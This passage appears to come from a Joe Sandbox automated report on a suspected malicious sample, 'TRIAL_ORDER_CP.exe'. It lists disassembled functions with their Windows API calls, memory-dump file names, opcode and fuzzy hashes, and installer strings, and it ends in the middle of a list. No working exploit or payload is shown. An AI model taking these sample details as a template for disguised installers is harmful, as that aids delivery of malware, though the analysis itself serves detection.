                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                          Function 0040451F Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404531
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                          • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                          • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                          • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                          Function 004034E7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403267,?), ref: 004034F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                          Function 00404508 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                          • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                          Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                          • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                          • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                          • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                          Function 706812BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: a6533e629b3d8bc6ae3734a33eba8cf19bdd39af857c902e9fad0a8d6e557d76
                                          • Instruction ID: 9e5d3c42d63c48dee2d542e620e45d2981f3eb100991c105e26e8770901c2626
                                          • Opcode Fuzzy Hash: a6533e629b3d8bc6ae3734a33eba8cf19bdd39af857c902e9fad0a8d6e557d76
                                          • Instruction Fuzzy Hash: 6CB00272640200BFEF409F55DD5EF353694F740705F744050B705D51D5D56458548565

                                          Non-executed Functions

                                          Function 0040619A Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                          • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                          • wsprintfA.USER32 ref: 00406219
                                          • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?), ref: 00406254
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406263
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040629B
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                          • GlobalFree.KERNEL32(00000000), ref: 00406302
                                          • CloseHandle.KERNEL32(00000000), ref: 00406309
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]$Mz$Uz
                                          • API String ID: 2171350718-3367237295
                                          • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                          • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                          Function 00406802 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 00406874
                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                          • CharPrevW.USER32(?,?,75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                          Strings
                                          • "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe", xrefs: 00406846
                                          • *?|<>/":, xrefs: 00406854
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-333691771
                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                          • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                          Function 0040453A Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                          • GetSysColor.USER32(00000000), ref: 00404595
                                          • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                          • SetBkMode.GDI32(?,?), ref: 004045AD
                                          • GetSysColor.USER32(?), ref: 004045C0
                                          • SetBkColor.GDI32(?,?), ref: 004045D0
                                          • DeleteObject.GDI32(?), ref: 004045EA
                                          • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                          • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                          Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                          • MulDiv.KERNEL32(000F78CC,00000064,000F7AD0), ref: 00403001
                                          • wsprintfW.USER32 ref: 00403011
                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040300B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
